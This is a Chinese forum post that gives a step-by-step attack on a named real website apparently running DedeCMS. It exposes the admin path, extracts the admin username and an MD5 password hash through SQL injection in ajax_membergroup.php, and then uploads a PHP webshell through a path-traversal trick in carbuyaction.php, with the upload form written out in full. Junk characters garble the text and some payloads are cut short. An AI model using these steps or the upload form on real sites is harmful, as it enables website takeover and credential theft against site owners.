①注入漏洞。$ f) v4 o6 J, I6 M# z) M. x: D
这站 http://www.political-security.com/) d7 O7 |3 T B, w8 b9 q
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,7 l8 o7 k! J+ K2 N+ s/ ~
www.political-security.com/data/mysql_error_trace.inc 爆后台
+ E: V; h) i' E, O8 K+ K然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。8 b6 f; Y3 Q6 w Y4 g O
然后写上语句 . A4 J$ G- ^3 M; b) g
查看管理员帐号. C9 n _5 k. \! y# A+ O: ~
http://www.political-security.co ... &membergroup=@`6 ? }5 N! @3 B: Z- b# R" J
4 z ]7 g) B% I- l
admin
9 ?! m. c9 X; V# T
; o w1 R7 B& F( C5 ?: ~9 V1 @查看管理员密码
2 x# j5 I$ i! F7 { http://www.political-security.co ... &membergroup=@`& G8 b- k% k) t, |2 s
+ G6 C; h% M+ [% L; \( J, Y8 G% k8d29b1ef9f8c5a5af429& ]6 h& w( o' h3 h+ {: x
& n& W5 d; J+ b6 ?) N
查看管理员密码
$ @1 b9 Y) l) T4 R: I3 _1 i$ ], O; ]3 p
$ _/ F8 g8 y* _; ~0 v3 g得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
2 ?. S1 m7 N% J( O( \; j9 ?- j& F" p, X& ^0 R3 q
8d2
& H) d) I& [. f" X# `) Q& c9b1ef9f8c5a5af42
) W; S& w& [- g" {9 @4 U" o; p9/ \4 _& U! N+ J7 G( t- O6 ?) \8 n- @
) h$ D1 ?- f. U6 gcmd5没解出来 只好测试第二个方法% ]( m/ P3 [+ L+ R+ t g. R' s
$ N+ Z( R$ L& C9 @" P h/ ^. N( v, y9 R
②上传漏洞:% k4 r- q3 _: E: ?& i& Q \$ y
. n7 V% @( L) B1 n. u9 N- ^只要登陆会员中心,然后访问页面链接
- P2 Y- j2 ?+ O9 u/ x2 z“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”! |) c# J5 i2 R u
4 ?8 ~* L6 |. m) u- R如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
, V7 i+ [5 D% H R
/ }! c7 c9 a5 J% c' V4 \; ?! R于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm' |3 R2 \% i! C! }5 \& U. x
$ n8 u- Y& ]- Y: q% [
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
0 n: ^; {! N% j6 w! K+ F' R或者
' P( \* c( M( [2 T7 S% ?即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对